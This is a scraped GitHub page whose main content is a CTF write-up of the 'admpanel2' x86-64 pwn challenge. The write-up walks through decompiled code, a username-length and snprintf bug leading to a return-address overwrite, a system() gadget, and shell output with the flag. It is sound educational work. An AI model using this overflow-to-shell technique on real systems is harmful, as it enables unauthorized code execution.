aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# Admpanel2 - x86-64 pwnWe are supplied with the binary [admpanel2](https://github.com/henriknero/writeups/tree/master/admpanel2/admpanel2). This is the followup to the challenge admpanel. Supposedly having patched the previous binary so it should be secure. ```$ file admpanel2 admpanel2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=3c92c2bcbc592fcec34f26a30abfde62b414a025, stripped```
The only change in the code that I was able to find was an added line to the exec_command function(0x4014d5):```c... else { printf(" Command to execute: "); fgets(local_408,0x400,stdin); iVar1 = strncmp(local_408,"id",2); if (iVar1 == 0) { local_408[2] = '\0'; //This line added. system(local_408); } else { puts("Any other commands than `id` have been disabled due to security concerns."); log_func("EXEC_HONEYPOT",is_admin,&DAT_004040e0,local_408); } }...```So the bug was likely present before the patch. The bug that we found was located in the authentication function, with a followup fault in the log function. **Because of this we are able to cause a buffer overflow and are able to overwrite the return address in exec_command function.**## Ghidra decompiled code of authenticate function(0x4013ed)```c... printf(" Input username: "); fgets(&DAT_004040e0,0x400,stdin); iVar1 = strncmp(&DAT_004040e0,"admin",5); if (iVar1 == 0) { printf(" Input password: "); fgets(local_408,0x400,stdin); iVar1 = strncmp(local_408,"password",8); if (iVar1 == 0) { is_admin = 1; }...```There are two bugs in the authentication functions that we can utilize. 1. So long as the first 5 chars are admin we are allowed supply 0x400-char username. 2. If we have logged in once, we can change the username without losing admin rights.
## Ghidra decompiled code of log_function(0x40121a)```c... int bytes_written; size_t snpr_size; char *output_string; output_string = also_output_string?; snpr_size = 0x100; bytes_written = snprintf(output_string,0x100,"LOG: [OPERATION: %s] ",error_message); if (bytes_written < 0) { /* WARNING: Subroutine does not return */ exit(1); } output_string = output_string + bytes_written; snpr_size = snpr_size - (long)bytes_written; if (is_admin != 0) { bytes_written = snprintf(output_string,snpr_size,"[USERNAME: %s] ",username); if (bytes_written < 0) { /* WARNING: Subroutine does not return */ exit(1); } output_string = output_string + bytes_written; snpr_size = snpr_size - (long)bytes_written; } if (*command != '\0') { bytes_written = snprintf(output_string,snpr_size,"%s",command); if (bytes_written < 0) { /* WARNING: Subroutine does not return */ exit(1); } output_string = output_string + bytes_written; snpr_size = snpr_size - (long)bytes_written; }...```Conveniently we already have a pointer to our username in RAX when we reach the return address in exec_command function. As we control this variable we simply set it to "/bin/sh;"+padding and then call the following gadget.```00401598 48 89 c7 MOV RDI,RAX0040159b e8 b0 fa CALL system ff ff
```
```$ ./exploit [*] '/home/henrik/midnight2020/admpanel2/admpanel2' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to admpanel2-01.play.midnightsunctf.se on port 31337: Done[*] Switching to interactive modeAny other commands than `id` have been disabled due to security concerns.$ lschallflagredir.sh$ cat flagmidnight{n3ver_4sk_hsp3_t0_do_s0m3th1ng}$ ```
The exploit script can be found [here](https://github.com/henriknero/writeups/tree/master/admpanel2/exploit) |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 2 at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="AF00:B9C6:A9065F0:AD6FF5F:64122180" data-pjax-transient="true"/><meta name="html-safe-nonce" content="a9c546f96437a1279d0a67b2b8ff1ae0bb05b393ed9210bc6a8e20232c783ed1" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJBRjAwOkI5QzY6QTkwNjVGMDpBRDZGRjVGOjY0MTIyMTgwIiwidmlzaXRvcl9pZCI6IjE5MzY5OTkzOTI4MzQ4ODgwNjQiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="107b359f521352e1515b478479820e7d2e6f9e3198d5efd4d422c178dcd04746" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 2 at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Midnight Sun CTF 2020 Quals/pwn/pwny racing 2 at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Midnight%20Sun%20CTF%202020%20Quals/pwn/pwny%20racing%202" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 